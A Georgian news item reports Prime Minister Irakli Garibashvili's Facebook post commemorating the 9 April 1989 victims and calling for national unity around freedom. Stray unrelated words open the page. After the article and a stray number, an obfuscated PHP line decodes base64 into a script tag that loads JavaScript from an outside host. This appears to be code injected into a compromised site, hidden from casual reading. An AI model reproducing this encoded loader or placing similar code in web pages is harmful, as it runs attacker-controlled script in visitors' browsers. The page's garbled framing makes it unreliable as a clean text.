celsiusi
ავერსი შნაიდერი

საქართველოს პრემიერი მინისტრის ირაკლი ღარიბაშვილი 9 აპრილის დღესთან დაკავშირებით Facebook-ის პირად გვერდზე პოსტს აქვეყნებს, სადაც წერს, რომ 9 აპრილს თავისუფლების იდეით გაერთიანებულმა საქართველომ მსოფლიოს გასაგონად გამოაცხადა დამოუკიდებელი, დემოკრატიული, ევროპული ქვეყნის მშენებლობის გადაწყვეტილება.

პრემიერმა სოციალურ ქსელში გამოქვეყნებულ პოსტში 9 აპრილს გარდაცვლილ ჰგმირებს პატივი მიაგო და განაცხადა, რომ ქვეყნის შემდგომი წინსვლაც თავისუფლებისკენ ასეთ იდეალებს უნდა დაეფუძნოს.

“9 აპრილი განსაკუთრებული დღეა თითოეული ჩვენგანისათვის.

ამ დღეს თავისუფლების იდეით გაერთიანებულმა სრულიად საქართველომ მსოფლიოს გასაგონად განაცხადა დამოუკიდებელი, დემოკრატიული, ევროპული ქვეყნის მშენებლობის გადაწყვეტილება. საბჭოთა რეჟიმის სისასტიკემ მხოლოდ განამტკიცა ქართველი ხალხის ნება, გააძლიერა ჩვენი სწრაფვა დამოუკიდებლობისაკენ.

ზვიად გამსახურდია ამბობდა: „ყველაფერი შეიძლება წაართვა ერს, მაგრამ ვერავინ შესძლებს თავისუფლების შეგრძნება წაართვას მას“. სწორედ ეს შეგრძნება, რომელიც მთელ ჩვენს ისტორიას განსაზღვრავდა, ყველაზე მკაფიოდ გამოვლინდა 1989 წლის 9 აპრილს.

დღეს ერთდროულად ტკივილისა და სიამაყის დღეა. კიდევ ერთხელ მივაგებთ პატივს იმ გმირების ნათელ ხსოვნას, ვინც საკუთარი სისხლის ფასად გაგვიკვალა გზა თავისუფლებისკენ. მადლიერებას გამოვხატავთ თითოეული მოქალაქისადმი, ვინც იმ გმირულ დღეებში ერთსულოვნებით, თავდადებითა და თანადგომით განსაზღვრა არა მხოლოდ საქართველოს, არამედ საბჭოთა კავშირის ქვეყნების მომავალი.

ჩვენი შემდგომი წინსვლა უკეთესი საქართველოსკენ კვლავ თავისუფლების იდეალის გარშემო ასეთ ერთსულოვნებას უნდა დაეფუძნოს”,-აღნიშნავს ირაკლი ღარიბაშვილი.

344
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");